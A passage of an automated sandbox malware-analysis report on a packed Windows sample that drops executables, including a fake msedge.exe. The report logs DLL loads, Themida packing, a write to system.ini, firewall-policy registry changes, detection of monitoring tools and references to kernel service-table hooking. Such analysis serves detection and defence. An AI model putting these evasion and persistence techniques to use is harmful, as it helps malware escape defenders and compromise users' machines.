            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wincorlib.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.xaml.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositorycore.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windowmanagementapi.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: inputhost.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: quickactionsdatamodel.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dxcore.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: mrmcorer.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: languageoverlayutil.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: bcp47mrm.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: uiamanager.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.immersive.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.globalization.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.globalization.fontgroups.dllJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: fontgroupsoverride.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile written: C:\Windows\system.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: PfBjDhHzvV.exeStatic file information: File size 2969674 > 1048576
            Source: PfBjDhHzvV.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x2c4000
            Source: Binary string: .objK.pdb source: SearchApp.exe, 0000000F.00000000.1623611969.000001F4AEDB0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2629107069.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2632453273.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000000.1802713048.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2625174200.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000000.1806477058.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2626066877.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2636248303.000000000038E000.00000002.00000001.01000000.00000008.sdmp
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_0129392D Sleep,lstrcpy,LoadLibraryA,GetProcAddress,FreeLibrary,lstrcat,LoadLibraryA,GetProcAddress,CreateThread,CreateThread,Sleep,Sleep,CreateThread,Sleep,Sleep,0_2_0129392D
            Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
            Source: PfBjDhHzvV.exeStatic PE information: section name:
            Source: PfBjDhHzvV.exeStatic PE information: section name:
            Source: PfBjDhHzvV.exeStatic PE information: section name:
            Source: PfBjDhHzvV.exeStatic PE information: section name:
            Source: PfBjDhHzvV.exeStatic PE information: section name: .themida
            Source: PfBjDhHzvV.exeStatic PE information: section name: .boot
            Source: msedge.exe.0.drStatic PE information: section name: .00cfg
            Source: msedge.exe.0.drStatic PE information: section name: .gxfg
            Source: msedge.exe.0.drStatic PE information: section name: .retplne
            Source: msedge.exe.0.drStatic PE information: section name: CPADinfo
            Source: msedge.exe.0.drStatic PE information: section name: LZMADEC
            Source: msedge.exe.0.drStatic PE information: section name: _RDATA
            Source: msedge.exe.0.drStatic PE information: section name: malloc_h
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_007A0000 push ecx; mov dword ptr [esp], ebp0_2_007A0028
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_007B0000 push 25757BCCh; mov dword ptr [esp], edx0_2_007B0097
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_007B0000 push 40C40DD0h; mov dword ptr [esp], edx0_2_007B0110
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_006FD651 push ecx; mov dword ptr [esp], eax0_2_006FD658
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_006FD651 push ecx; mov dword ptr [esp], eax0_2_006FD65C
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_0130F217 push ds; ret 0_2_0130F222
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_0130F200 push ss; ret 0_2_0130F204
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01298060 push eax; ret 0_2_0129808E
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_05B31AB7 push ds; ret 0_2_05B31AC2
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_05B31AA0 push ss; ret 0_2_05B31AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 29_2_02411AA0 push ss; ret 29_2_02411AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 29_2_02411AB7 push ds; ret 29_2_02411AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 30_2_02291AA0 push ss; ret 30_2_02291AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 30_2_02291AB7 push ds; ret 30_2_02291AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 31_2_00951AB7 push ds; ret 31_2_00951AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 31_2_00951AA0 push ss; ret 31_2_00951AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 32_2_00BF1AB7 push ds; ret 32_2_00BF1AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 32_2_00BF1AA0 push ss; ret 32_2_00BF1AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 33_2_00341AB7 push ds; ret 33_2_00341AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 33_2_00341AA0 push ss; ret 33_2_00341AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 34_2_01491AA0 push ss; ret 34_2_01491AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 34_2_01491AB7 push ds; ret 34_2_01491AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 35_2_0292F217 push ds; ret 35_2_0292F222
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 35_2_0292F200 push ss; ret 35_2_0292F204
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 35_2_028B8060 push eax; ret 35_2_028B808E
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 35_2_02471AA0 push ss; ret 35_2_02471AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 35_2_02471AB7 push ds; ret 35_2_02471AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 36_2_00F61AB7 push ds; ret 36_2_00F61AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 36_2_00F61AA0 push ss; ret 36_2_00F61AA4
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 37_2_021D1AB7 push ds; ret 37_2_021D1AC2
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 37_2_021D1AA0 push ss; ret 37_2_021D1AA4
            Source: PfBjDhHzvV.exeStatic PE information: section name: entropy: 7.775257437192022
            Source: xjjalq.exe.0.drStatic PE information: section name: .text entropy: 7.985008600362211
            Source: xlroe.exe.0.drStatic PE information: section name: .text entropy: 7.985007081506113
            Source: taqcpb.exe.0.drStatic PE information: section name: .text entropy: 7.985007081506113
            Source: winysum.exe.35.drStatic PE information: section name: .text entropy: 7.98932370060711
            Source: winbwxmuq.exe.35.drStatic PE information: section name: .text entropy: 7.9828875500354215
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: C:\taqcpb.exeJump to dropped file
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: C:\Users\user\AppData\Local\Temp\xlroe.exeJump to dropped file
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile created: C:\Users\user\AppData\Local\Temp\winysum.exeJump to dropped file
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: C:\Users\user\AppData\Local\Temp\xjjalq.exeJump to dropped file
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile created: C:\Users\user\AppData\Local\Temp\winbwxmuq.exeJump to dropped file

            Boot Survival

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            May modify the system service descriptor table (often done to hook functions)
            Source: PfBjDhHzvV.exeBinary or memory string: KeServiceDescriptorTable
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: faawXJQQDELvfTymNiVz.exeBinary or memory string: KeServiceDescriptorTable
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
